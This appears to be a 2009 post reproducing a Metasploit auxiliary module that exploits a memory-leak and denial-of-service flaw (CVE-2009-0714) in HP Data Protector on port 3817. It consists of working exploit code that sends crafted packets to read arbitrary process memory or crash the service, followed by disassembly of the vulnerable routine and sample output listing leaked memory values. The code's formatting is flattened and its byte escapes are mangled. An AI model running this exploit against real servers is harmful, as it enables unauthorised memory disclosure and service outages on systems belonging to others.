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Posted on 24 June 2009

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector 4.00-SP1 Build 43064 Memory leak and DoS', 'Description' => %q{ HP Data Protector is prone to a memory leak vulnerability. The same vector of exploitation can be used for denial of service attack if an invalid memory address is accessed. }, 'Author' => [ 'Nibin' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: ???? $', 'References' => [ [ 'URL', 'http://ivizsecurity.com/security-advisory-iviz-sr-09002.html' ], [ 'CVE', 'CVE-2009-0714' ], ], 'DisclosureDate' => 'May 13 2009')) register_options( [ Opt::RPORT(3817), OptString.new('MEMORY', [ false, 'The starting address of memory', '0x7ffdf000']), OptString.new('SIZE', [false,'The size of memory to leak (in Bytes)',80]), OptString.new('DoS', [false,'Enable or Disable DoS mode',false]), ], self.class) end def run data = "x54x84x00x00" data += "x00x00x00x00" data += "x06x00x00x00" data += "x92x00x00x00" data += "x41" * 130 mem_size = datastore['SIZE'].to_i mem_addr = datastore['MEMORY'].hex if (mem_addr == 0) puts("[!] Starting memory address is zero. Setting it to PEB address (Default)") mem_addr = "0x7ffdf000".hex end if (mem_size < 0) puts("[!] Memory size is negative. Setting it to default") mem_size = 80 end if (!datastore['DoS']) offset = 0 print_status("Starting Memory Address: 0x#{mem_addr.to_s(16)} ") while (offset < mem_size) connect t = ( ( ( ( mem_addr + offset ) - 0x1022A4F0 ) / 4 ) - 4 ) pkt = data[0,32] + ([t].pack('V')) + data[36,110] sock.put(pkt) sleep(1) res = sock.get_once leak = res[32,4].unpack('V') puts "[*] Leaking Memory: 0x#{(mem_addr + offset).to_s(16)} -> 0x%x" % [leak.to_s] offset +=4 disconnect end else print_status("Sending evil packet") pkt = data connect sock.put(pkt) disconnect end end end =begin Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80 100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754] 100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598] 100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data 100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset 100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak 100DDEA3 83C4 1C ADD ESP,1C 100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI n@n-laptop:/mnt/projects/metasploit$ ./msfcli auxiliary/admin/dataprotector/hp_dataprotector RHOST= MEMORY=0x7ffdf000 E [*]Please wait while we load the module tree... [*] Starting Memory Address: 0x7ffdf000 [*] Leaking Memory: 0x7ffdf000 -> 0x12fbc4 [*] Leaking Memory: 0x7ffdf004 -> 0x130000 [*] Leaking Memory: 0x7ffdf008 -> 0x12d000 [*] Leaking Memory: 0x7ffdf00c -> 0x0 [*] Leaking Memory: 0x7ffdf010 -> 0x1e00 [*] Leaking Memory: 0x7ffdf014 -> 0x0 [*] Leaking Memory: 0x7ffdf018 -> 0x7ffdf000 [*] Leaking Memory: 0x7ffdf01c -> 0x0 [*] Leaking Memory: 0x7ffdf020 -> 0x674 [*] Leaking Memory: 0x7ffdf024 -> 0xa8 [*] Leaking Memory: 0x7ffdf028 -> 0x0 [*] Leaking Memory: 0x7ffdf02c -> 0x0 [*] Leaking Memory: 0x7ffdf030 -> 0x7ffd5000 [*] Leaking Memory: 0x7ffdf034 -> 0x0 [*] Leaking Memory: 0x7ffdf038 -> 0x0 [*] Leaking Memory: 0x7ffdf03c -> 0x0 [*] Leaking Memory: 0x7ffdf040 -> 0xe20abeb0 [*] Leaking Memory: 0x7ffdf044 -> 0x0 [*] Leaking Memory: 0x7ffdf048 -> 0x0 [*] Leaking Memory: 0x7ffdf04c -> 0x0 =end